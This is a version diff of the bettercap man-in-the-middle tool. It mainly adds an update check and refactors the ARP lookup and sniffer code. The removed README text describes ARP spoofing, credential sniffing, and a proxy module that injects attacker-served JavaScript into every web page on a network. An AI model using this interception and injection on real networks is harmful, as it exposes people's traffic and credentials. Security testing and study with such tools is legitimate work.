bettercap 1.1.2 → 1.1.3

checksums.yaml

@@ -1,7 +1,7 @@
 ---
 SHA1:
-  metadata.gz: f5189ce91219e92b52425d6998055595f6a95e62
-  data.tar.gz: d7e82086dd586073fef89bdf446b1d6277bcf0b6
+  metadata.gz: 3ec474a048798ccf1e1cdffd8e9cd89451664e34
+  data.tar.gz: b7a71427a38b282296afe4ea29e4ff17544a2ae8
 SHA512:
-  metadata.gz: aad971a8c77e6909117a5057b843734cc0e6bb53b7cbf324db5d6c6db7c6d9b08c2e41e1971d660ec506a82338f7a850aebb25b2f5de95a64214d261a039ab06
-  data.tar.gz: 364295824c4b2104be96c44facef757afb559483adae7003785614ac9f78220dbd06cc441fb25f93933636d1d3cca0fe9b7909245915e314d2710a47f8cf2baf
+  metadata.gz: 1181286df3a437f4687ad6472dec73979358f517946775f7b5b058831bdd8209505ae8efe77e2034698d7cc0952daeb4b80e072f28698e6fee2b3e46304c6105
+  data.tar.gz: b180321825414edddc52aa36d3eee9a3c67c320aa55ed1911a1fe5c0a9758c241adc914bfab558dc1fe15c32d65574ec1b62e3dd2e993661a20b1744c11708f1

data/README.md

@@ -4,151 +4,12 @@ Copyleft of Simone '[evilsocket](https://twitter.com/evilsocket)' Margaritelli*.
 
 http://www.bettercap.org/
 
-[![Gem Version](https://badge.fury.io/rb/bettercap.svg)](http://badge.fury.io/rb/bettercap) 
+[![Gem Version](https://badge.fury.io/rb/bettercap.svg)](http://badge.fury.io/rb/bettercap) [![Code Climate](https://codeclimate.com/github/evilsocket/bettercap/badges/gpa.svg)](https://codeclimate.com/github/evilsocket/bettercap)
 ---
 
 **bettercap** is a complete, modular, portable and easily extensible **MITM** tool and framework with every kind of diagnostic
 and offensive feature you could need in order to perform a man in the middle attack.
 
-MOTIVATIONS
-===
-
-> Yet another MITM tool? C'mon, really?!!?
-
-This is exactly what you are thinking right now, isn't it? :D
-But allow yourself to think about it for 5 more minutes ... what you should be really asking is:
-
-> Does a complete, modular, portable and easy to extend MITM tool actually exist?
-
-If your answer is "ettercap", let me tell you something:
-
-* ettercap **was** a great tool, but it made its time.
-* ettercap filters **do not** work most of the times, are outdated and hard to implement due to the specific language they're implemented in.
-* ettercap is freaking **unstable** on big networks ... try to launch the host discovery on a bigger network rather than the usual /24 ;)
-* yeah you can see connections and raw pcap stuff, **nice toy**, but **as a professional researcher I want to see only relevant stuff**.
-* unless you're a C/C++ developer, you can't easily extend ettercap or make your own module.
-
-Indeed you could use more than just one tool ... maybe [arpspoof](http://linux.die.net/man/8/arpspoof) to perform the actual poisoning, [mitmproxy](http://mitmproxy.org) to intercept HTTP stuff and inject your payloads and so forth ... I don't know about you, but I **hate** when I need to use a dozen of tools just to perform one single attack, especially when I need to do some black magic in order to make all of them work on my distro or on OSX ... what about the [KISS](https://en.wikipedia.org/wiki/KISS_principle) principle?
-
-So **bettercap** was born ( isn't the name pure genius? XD ) ...
-
-HOST DISCOVERY + ARP MAN IN THE MIDDLE
-=== 
-
-You can target the whole network or a single known address, it doesn't really matter, bettercap arp spoofing capabilities and its multiple hosts discovery agents will do the dirty work for you.  
-Just launch the tool and wait for it to do its job ... again, [KISS!](https://en.wikipedia.org/wiki/KISS_principle)
-
-![credentials](http://bettercap.org/images/discovery.png)
-
-CREDENTIALS SNIFFER
-===
-
-The built in sniffer is currently able to dissect and print from the network the following informations:
-
-- URLs being visited.
-- HTTPS host being visited.
-- HTTP POSTed data.
-- HTTP Basic and Digest authentications.
-- FTP credentials.
-- IRC credentials.
-- POP, IMAP and SMTP credentials.
-- NTLMv1/v2 ( HTTP, SMB, LDAP, etc ) credentials.
-
-![credentials](http://bettercap.org/images/credentials.png)
-
-**Examples**
-
-Default sniffer mode, all parsers enabled:
-    
-    sudo bettercap -X
-    
-Enable sniffer and load only specified parsers:
-    
-    sudo bettercap -X -P "FTP,HTTPAUTH,MAIL,NTLMSS"
-
-Enable sniffer + all parsers and parse local traffic as well:
-    
-    sudo bettercap -X -L
-    
-MODULAR TRANSPARENT PROXY
-===
-
-A modular transparent proxy can be started with the --proxy argument, by default it won't do anything 
-but logging HTTP requests, but if you specify a **--proxy-module** argument you will be able to load
-your own modules and manipulate HTTP traffic as you like.  
-You can find some example modules in the [dedicated repository](https://github.com/evilsocket/bettercap-proxy-modules).
-
-![credentials](http://bettercap.org/images/proxy.png)
-
-**Examples**
-
-Enable proxy on default ( 8080 ) port with no modules ( quite useless ): 
-    
-    sudo bettercap --proxy
-
-Enable proxy and use a custom port:
-    
-    sudo bettercap --proxy --proxy-port=8081
-    
-Enable proxy and load the module **hack_title.rb**:
-    
-    sudo bettercap --proxy --proxy-module=hack_title.rb
-
-Disable spoofer and enable proxy ( stand alone proxy mode ):
-
-    sudo bettercap -S NONE --proxy
-
-**Modules**
-
-You can easily implement a module to inject data into pages or just inspect the
-requests/responses creating a ruby file and passing it to bettercap with the --proxy-module argument, 
-the following is a sample module that injects some contents into the title tag of each html page.
-
-```ruby
-class HackTitle < Proxy::Module
-  def on_request( request, response )
-    # is it a html page?
-    if response.content_type == 'text/html'
-      Logger.info "Hacking http://#{request.host}#{request.url} title tag"
-      # make sure to use sub! or gsub! to update the instance
-      response.body.sub!( '<title>', '<title> !!! HACKED !!! ' )
-    end
-  end
-end
-```
-
-BUILTIN HTTP SERVER
-===
-
-You want to serve your custom javascript files on the network? Maybe you wanna inject some custom
-script or image into HTTP responses using a transparent proxy module but you got no public server
-to use? **no worries dude** :D  
-A builtin HTTP server comes with bettercap, allowing you to serve custom contents from your own
-machine without installing and configuring other softwares such as Apache, nginx or lighttpd. 
-
-You could use a **proxy module** like the following:
-
-```ruby
-class InjectJS < Proxy::Module
-  def on_request( request, response )
-    # is it a html page?
-    if response.content_type == 'text/html'
-      Logger.info "Injecting javascript file into http://#{request.host}#{request.url} page"
-      # get the local interface address and HTTPD port
-      localaddr = Context.get.ifconfig[:ip_saddr]
-      localport = Context.get.options[:httpd_port]
-      # inject the js
-      response.body.sub!( '</title>', "</title><script src='http://#{localaddr}:#{localport}/file.js' type='text/javascript'></script>" )
-    end
-  end
-end
-```
-
-And then use it to inject the js file in every HTTP response of the network, using bettercap itself
-to serve the file:
-
-    sudo bettercap --httpd --http-path=/path/to/your/js/file/ --proxy --proxy-module=inject.rb 
-
 HOW TO INSTALL
 ===
 
@@ -173,3 +34,8 @@ dependency in order to make everything work:
    
 This should solve issues such as [this one](https://github.com/evilsocket/bettercap/issues/22).
 
+
+EXAMPLES & INSTRUCTIONS
+===
+
+Please refer to the [official website](http://bettercap.org).

data/TODO.md

@@ -6,16 +6,17 @@ This is a list of TODOs I use to keep track of tasks and upcoming features.
 - [x] Capture to .pcap file.
 - [x] BPF filters.
 - [x] BeEF proxy module ( [BeefBOX](https://github.com/evilsocket/bettercap-proxy-modules/blob/master/beefbox.rb) ).
-- [ ] ICMP Redirect.
+- [x] Use raw file arp parsing instead of "arp -a" to improve speed. ( Solved with arp -a -n )
+- [ ] *BSD Support.
 - [ ] sslstrip
 - [ ] sslmitm
-- [ ] *BSD Support.
 - [ ] HTTP/2 Support.
 - [ ] Active packet filtering/injection/etc.
 
 **Maybe**
 
 - [ ] Replace webrick with thin ( proxy too? )
+- [ ] ICMP Redirect ? ( only half duplex and filtered by many firewalls anyway ... dunno ).
 - [ ] DNS Spoofing ( not sure if it actually makes any sense ).
 - [ ] Windows Support? ( OMG PLZ NO! )
 - [ ] Output/actions as json for UI integration?

data/bin/bettercap

@@ -22,6 +22,7 @@ begin
 
   OptionParser.new do |opts|
     opts.banner = "Usage: #{$0} [options]"
+    opts.version = BetterCap::VERSION
 
     opts.on( '-I', '--interface IFACE', 'Network interface name - default: ' + ctx.options[:iface].to_s ) do |v|
       ctx.options[:iface] = v
@@ -103,6 +104,10 @@ begin
       ctx.options[:httpd_path] = v
     end
 
+    opts.on( '--check-updates', 'Will check if any update is available and then exit.' ) do
+      ctx.options[:check_updates] = true
+    end
+
     opts.on('-h', '--help', 'Display the available options.') do
       puts opts
       puts "\nExamples:\n".bold
@@ -126,6 +131,21 @@ begin
     end
   end.parse!
 
+  if ctx.options[:check_updates]
+    begin
+    ver = ctx.check_updates
+    if !ver.nil?
+      Logger.warn "New version #{ver} available!"
+    else
+      Logger.info 'You are running the latest version.'
+    end
+    rescue Exception => e
+      Logger.error "Could not check for updates: #{e.message}"
+    end
+
+    exit
+  end
+
   raise BetterCap::Error, 'This software must run as root.' unless Process.uid == 0
   raise BetterCap::Error, 'No default interface found, please specify one with the -I argument.' unless !ctx.options[:iface].nil?
 

data/lib/bettercap/base/ifirewall.rb

@@ -10,6 +10,10 @@ This project is released under the GPL 3 license.
 
 =end
 class IFirewall
+  def initialize
+    @frwd_initial_state = forwarding_enabled?
+  end
+
   def enable_forwarding(enabled)
     not_implemented_method!
   end
@@ -26,6 +30,12 @@ class IFirewall
     not_implemented_method!
   end
 
+  def restore
+    if forwarding_enabled? != @frwd_initial_state
+      enable_forwarding @frwd_initial_state
+    end
+  end
+
 private
 
   def not_implemented_method!

data/lib/bettercap/context.rb

@@ -11,7 +11,10 @@ This project is released under the GPL 3 license.
 =end
 
 # this class holds global states & data
+require 'bettercap/version'
 require 'bettercap/error'
+require 'net/http'
+require 'json'
 
 class Context
   attr_accessor :options, :ifconfig, :network, :firewall, :gateway,
@@ -32,26 +35,28 @@ class Context
     end
 
     @options = {
-      :iface => iface,
-      :spoofer => 'ARP',
-      :target => nil,
-      :logfile => nil,
-      :debug => false,
-      :arpcache => false,
-
-      :sniffer => false,
-      :sniffer_pcap => nil,
-      :sniffer_filter => nil,
-      :parsers => ['*'],
-      :local => false,
-
-      :proxy => false,
-      :proxy_port => 8080,
-      :proxy_module => nil,
-
-      :httpd => false,
-      :httpd_port => 8081,
-      :httpd_path => './'
+      iface: iface,
+      spoofer: 'ARP',
+      target: nil,
+      logfile: nil,
+      debug: false,
+      arpcache: false,
+
+      sniffer: false,
+      sniffer_pcap: nil,
+      sniffer_filter: nil,
+      parsers: ['*'],
+      local: false,
+
+      proxy: false,
+      proxy_port: 8080,
+      proxy_module: nil,
+
+      httpd: false,
+      httpd_port: 8081,
+      httpd_path: './',
+
+      check_updates: false
     }
 
     @ifconfig  = nil
@@ -67,6 +72,19 @@ class Context
     @discovery_thread  = nil
   end
 
+  def check_updates
+    Logger.info 'Checking for updates ...'
+
+    api  = URI('https://api.github.com/repos/evilsocket/bettercap/releases/latest')
+    body = Net::HTTP.get(api)
+    json = JSON.parse(body)
+
+    if json['tag_name'] != BetterCap::VERSION and json['tag_name'] != "v#{BetterCap::VERSION}"
+      return json['tag_name']
+    end
+    nil
+  end
+
   def update_network
     @firewall = FirewallFactory.get_firewall
     @ifconfig = PacketFu::Utils.ifconfig @options[:iface]
@@ -135,7 +153,7 @@ class Context
     end
 
     if !@firewall.nil?
-      @firewall.enable_forwarding(false)
+      @firewall.restore
     end
 
     if !@httpd.nil?

data/lib/bettercap/discovery/arp.rb

@@ -13,6 +13,7 @@ require 'bettercap/logger'
 require 'bettercap/shell'
 require 'bettercap/target'
 require 'bettercap/discovery/base'
+require 'bettercap/context'
 
 # Parse the ARP table searching for new hosts.
 class ArpAgent < BaseAgent
@@ -37,6 +38,22 @@ class ArpAgent < BaseAgent
     targets
   end
 
+  def self.find_address( ip )
+    arp = Shell.arp
+    mac = nil
+
+    arp.split("\n").each do |line|
+      m = /[^\s]+\s+\(([0-9\.]+)\)\s+at\s+([a-f0-9:]+).+#{Context.get.ifconfig[:iface]}.*/i.match(line)
+      if !m.nil?
+        if m[1] == ip and m[2] != 'ff:ff:ff:ff:ff:ff'
+          mac = m[2]
+        end
+      end
+    end
+
+    mac
+  end
+
   private
 
   def send_probe( ip )

data/lib/bettercap/httpd/server.rb

@@ -20,10 +20,10 @@ class Server
     @port = port
     @path = path
     @server = WEBrick::HTTPServer.new(
-      :Port => @port,
-      :DocumentRoot => @path,
-      :Logger => WEBrick::Log.new("/dev/null"),
-      :AccessLog => []
+      Port: @port,
+      DocumentRoot: @path,
+      Logger: WEBrick::Log.new("/dev/null"),
+      AccessLog: []
     )
   end
 

data/lib/bettercap/monkey/packetfu/utils.rb

@@ -26,51 +26,69 @@ module PacketFu
       Logger.debug "ifconfig #{iface}"
       
       ifconfig_data = Shell.ifconfig(iface)
-      
+      if ifconfig_data =~ /#{iface}/i
+        ifconfig_data = ifconfig_data.split(/[\s]*\n[\s]*/)
+      else
+        raise ArgumentError, "Cannot ifconfig #{iface}"
+      end
+
       case RUBY_PLATFORM
       when /linux/i
-        Logger.debug "Linux ifconfig #{iface}:\n#{ifconfig_data}"
-        
-        if ifconfig_data =~ /#{iface}/i
-          ifconfig_data = ifconfig_data.split(/[\s]*\n[\s]*/)
-        else
-          raise ArgumentError, "Cannot ifconfig #{iface}"
-        end
-        real_iface = ifconfig_data.first
-        ret[:iface] = real_iface.split.first.downcase.gsub(':','')
-        if real_iface =~ /[\s]HWaddr[\s]+([0-9a-fA-F:]{17})/i
-          ret[:eth_saddr] = $1.downcase
-          ret[:eth_src] = EthHeader.mac2str(ret[:eth_saddr])
-        end
-        ifconfig_data.each do |s|
-          case s
+        ret = linux_ifconfig iface, ifconfig_data
+      when /darwin/i
+        ret = darwin_ifconfig iface, ifconfig_data
+      end
+
+      ret
+    end
+
+    private
+
+    def self.linux_ifconfig(iface='eth0',ifconfig_data)
+      Logger.debug "Linux ifconfig #{iface}:\n#{ifconfig_data}"
+
+      ret = {}
+      real_iface = ifconfig_data.first
+      ret[:iface] = real_iface.split.first.downcase.gsub(':','')
+
+      if real_iface =~ /[\s]HWaddr[\s]+([0-9a-fA-F:]{17})/i
+        ret[:eth_saddr] = $1.downcase
+        ret[:eth_src] = EthHeader.mac2str(ret[:eth_saddr])
+      end
+
+      ifconfig_data.each do |s|
+        case s
           when /inet [a-z]+:[\s]*([0-9]+\.[0-9]+\.[0-9]+\.[0-9]+)(.*[a-z]+:([0-9]+\.[0-9]+\.[0-9]+\.[0-9]+))?/i
             ret[:ip_saddr] = $1
-            ret[:ip_src] = [IPAddr.new($1).to_i].pack("N")
+            ret[:ip_src] = [IPAddr.new($1).to_i].pack('N')
             ret[:ip4_obj] = IPAddr.new($1)
             ret[:ip4_obj] = ret[:ip4_obj].mask($3) if $3
           when /inet[\s]+([0-9]+\.[0-9]+\.[0-9]+\.[0-9]+)(.*Mask[\s]+([0-9]+\.[0-9]+\.[0-9]+\.[0-9]+))?/i
             ret[:ip_saddr] = $1
-            ret[:ip_src] = [IPAddr.new($1).to_i].pack("N")
+            ret[:ip_src] = [IPAddr.new($1).to_i].pack('N')
             ret[:ip4_obj] = IPAddr.new($1)
             ret[:ip4_obj] = ret[:ip4_obj].mask($3) if $3
           when /inet6 [a-z]+:[\s]*([0-9a-fA-F:\x2f]+)/
             ret[:ip6_saddr] = $1
             ret[:ip6_obj] = IPAddr.new($1)
-          end
-        end # linux
-      when /darwin/i
-        Logger.debug "OSX ifconfig #{iface}:\n#{ifconfig_data}"
-        
-        if ifconfig_data =~ /#{iface}/i
-          ifconfig_data = ifconfig_data.split(/[\s]*\n[\s]*/)
-        else
-          raise ArgumentError, "Cannot ifconfig #{iface}"
+          when /ether[\s]+([0-9a-fA-F:]{17})/i
+            ret[:eth_saddr] = $1.downcase
+            ret[:eth_src] = EthHeader.mac2str(ret[:eth_saddr])
         end
-        real_iface = ifconfig_data.first
-        ret[:iface] = real_iface.split(':')[0]
-        ifconfig_data.each do |s|
-          case s
+      end
+
+      ret
+    end
+
+    def self.darwin_ifconfig(iface='eth0',ifconfig_data)
+      Logger.debug "OSX ifconfig #{iface}:\n#{ifconfig_data}"
+
+      ret = {}
+      real_iface = ifconfig_data.first
+      ret[:iface] = real_iface.split(':')[0]
+
+      ifconfig_data.each do |s|
+        case s
           when /ether[\s]([0-9a-fA-F:]{17})/i
             ret[:eth_saddr] = $1
             ret[:eth_src] = EthHeader.mac2str(ret[:eth_saddr])
@@ -87,9 +105,9 @@ module PacketFu
           when /inet6[\s]*([0-9a-fA-F:\x2f]+)/
             ret[:ip6_saddr] = $1
             ret[:ip6_obj] = IPAddr.new($1)
-          end
-        end # darwin
-      end # RUBY_PLATFORM
+        end
+      end
+
       ret
     end
   end

data/lib/bettercap/network.rb

@@ -40,6 +40,7 @@ class Network
       out.each do |line|
         if line.include?( Context.get.options[:iface] )
           gw = line.split[1]
+          break if is_ip?(gw)
         end
       end
 
@@ -91,41 +92,43 @@ class Network
   won't catch anything, instead we're using cap.stream.each.
 =end
     def get_hw_address( iface, ip_address, attempts = 2 )
-      hw_address = nil
-
-      attempts.times do
-        arp_pkt = PacketFu::ARPPacket.new
-
-        arp_pkt.eth_saddr     = arp_pkt.arp_saddr_mac = iface[:eth_saddr]
-        arp_pkt.eth_daddr     = 'ff:ff:ff:ff:ff:ff'
-        arp_pkt.arp_daddr_mac = '00:00:00:00:00:00'
-        arp_pkt.arp_saddr_ip  = iface[:ip_saddr]
-        arp_pkt.arp_daddr_ip  = ip_address
-
-        cap_thread = Thread.new do
-          target_mac = nil
-          timeout = 0
-
-          cap = PacketFu::Capture.new(
-            :iface => iface[:iface],
-            :start => true,
-            :filter => "arp src #{ip_address} and ether dst #{arp_pkt.eth_saddr}"
-          )
-          arp_pkt.to_w(iface[:iface])
-
-          begin
-            Logger.debug 'Attempting to get MAC from packet capture ...'
-            target_mac = Timeout::timeout(0.5) { get_mac_from_capture(cap, ip_address) }
-          rescue Timeout::Error
-            timeout += 0.1
-            retry if target_mac.nil? && timeout <= 5
+      hw_address = ArpAgent.find_address( ip_address )
+
+      if hw_address.nil?
+        attempts.times do
+          arp_pkt = PacketFu::ARPPacket.new
+
+          arp_pkt.eth_saddr     = arp_pkt.arp_saddr_mac = iface[:eth_saddr]
+          arp_pkt.eth_daddr     = 'ff:ff:ff:ff:ff:ff'
+          arp_pkt.arp_daddr_mac = '00:00:00:00:00:00'
+          arp_pkt.arp_saddr_ip  = iface[:ip_saddr]
+          arp_pkt.arp_daddr_ip  = ip_address
+
+          cap_thread = Thread.new do
+            target_mac = nil
+            timeout = 0
+
+            cap = PacketFu::Capture.new(
+              iface: iface[:iface],
+              start: true,
+              filter: "arp src #{ip_address} and ether dst #{arp_pkt.eth_saddr}"
+            )
+            arp_pkt.to_w(iface[:iface])
+
+            begin
+              Logger.debug 'Attempting to get MAC from packet capture ...'
+              target_mac = Timeout::timeout(0.5) { get_mac_from_capture(cap, ip_address) }
+            rescue Timeout::Error
+              timeout += 0.1
+              retry if target_mac.nil? && timeout <= 5
+            end
+
+            target_mac
           end
+          hw_address = cap_thread.value
 
-          target_mac
+          break unless hw_address.nil?
         end
-        hw_address = cap_thread.value
-
-        break unless hw_address.nil?
       end
 
       hw_address

data/lib/bettercap/proxy/proxy.rb

@@ -213,7 +213,7 @@ class Proxy
         if request.content_length > 0
           Logger.debug "Getting #{request.content_length} bytes from client"
 
-          binary_streaming client, server, :request => request
+          binary_streaming client, server, request: request
         end
 
         Logger.debug 'Reading response ...'
@@ -240,7 +240,7 @@ class Proxy
 
           Logger.debug 'Binary streaming'
 
-          binary_streaming server, client, :response => response
+          binary_streaming server, client, response: response
         end
 
         Logger.debug "#{client_ip}:#{client_port} served."

data/lib/bettercap/shell.rb

@@ -24,7 +24,7 @@ module Shell
     end
 
     def arp
-      self.execute( 'LANG=en && arp -a' )
+      self.execute( 'LANG=en && arp -a -n' )
     end
 
   end

data/lib/bettercap/sniffer/sniffer.rb

@@ -17,36 +17,34 @@ require 'packetfu'
 class Sniffer
   include PacketFu
 
+  @@ctx     = nil
   @@parsers = nil
+  @@pcap    = nil
+  @@cap     = nil
 
   def self.start( ctx )
     Logger.info 'Starting sniffer ...'
 
-    pcap = nil
+    setup( ctx )
 
-    if !ctx.options[:sniffer_pcap].nil?
-      pcap = PcapFile.new
-      Logger.warn "Saving packets to #{ctx.options[:sniffer_pcap]} ."
+    @@cap.stream.each do |p|
+      append_packet p
+      parse_packet p
     end
+  end
 
-    @@parsers = ParserFactory.load_by_names ctx.options[:parsers]
-
-    cap = Capture.new(
-        :iface => ctx.options[:iface],
-        :filter => ctx.options[:sniffer_filter],
-        :start => true
-    )
-    cap.stream.each do |p|
-      begin
-        pcap.array_to_file( :filename => ctx.options[:sniffer_pcap], :array => [p], :append => true) unless pcap.nil?
-      rescue Exception => e
-        Logger.warn e.message
-      end
+  private
 
+  def self.parse_packet( p )
+    begin
       pkt = Packet.parse p
-      if not pkt.nil? and pkt.is_ip?
-        next if ( pkt.ip_saddr == ctx.ifconfig[:ip_saddr] or pkt.ip_daddr == ctx.ifconfig[:ip_saddr] ) and !ctx.options[:local]
+    rescue Exception => e
+      pkt = nil
+      Logger.debug e.message
+    end
 
+    if not pkt.nil? and pkt.is_ip?
+      if !skip_packet? pkt
         @@parsers.each do |parser|
           begin
             parser.on_packet pkt
@@ -57,4 +55,38 @@ class Sniffer
       end
     end
   end
+
+  def self.skip_packet?( pkt )
+    !@@ctx.options[:local] and
+    ( pkt.ip_saddr == @@ctx.ifconfig[:ip_saddr] or
+      pkt.ip_daddr == @@ctx.ifconfig[:ip_saddr] )
+  end
+
+  def self.append_packet( p )
+    begin
+      @@pcap.array_to_file(
+          filename: @@ctx.options[:sniffer_pcap],
+          array: [p],
+          append: true ) unless @@pcap.nil?
+    rescue Exception => e
+      Logger.warn e.message
+    end
+  end
+
+  def self.setup( ctx )
+    @@ctx = ctx
+
+    if !@@ctx.options[:sniffer_pcap].nil?
+      @@pcap = PcapFile.new
+      Logger.warn "Saving packets to #{@@ctx.options[:sniffer_pcap]} ."
+    end
+
+    @@parsers = ParserFactory.load_by_names @@ctx.options[:parsers]
+
+    @@cap = Capture.new(
+        iface: @@ctx.options[:iface],
+        filter: @@ctx.options[:sniffer_filter],
+        start: true
+    )
+  end
 end

data/lib/bettercap/spoofers/arp.rb

@@ -84,7 +84,7 @@ class ArpSpoofer < ISpoofer
           if target.mac.nil?
             Logger.warn "Getting target #{target.ip} MAC address ..."
 
-            hw = Network.get_hw_address( @ctx.ifconfig, target.ip, 1 )
+            hw = Network.get_hw_address( @ctx.ifconfig, target.ip )
             if hw.nil?
               Logger.warn "Couldn't determine target MAC"
               next

data/lib/bettercap/version.rb

@@ -10,6 +10,6 @@ This project is released under the GPL 3 license.
 
 =end
 module BetterCap
-  VERSION = '1.1.2'
+  VERSION = '1.1.3'
   BANNER = File.read( File.dirname(__FILE__) + '/banner' ).gsub( '#VERSION#', "v#{VERSION}")
 end

metadata

@@ -1,14 +1,14 @@
 --- !ruby/object:Gem::Specification
 name: bettercap
 version: !ruby/object:Gem::Version
-  version: 1.1.2
+  version: 1.1.3
 platform: ruby
 authors:
 - Simone Margaritelli
 autorequire: 
 bindir: bin
 cert_chain: []
-date: 2015-07-26 00:00:00.000000000 Z
+date: 2015-07-27 00:00:00.000000000 Z
 dependencies:
 - !ruby/object:Gem::Dependency
   name: colorize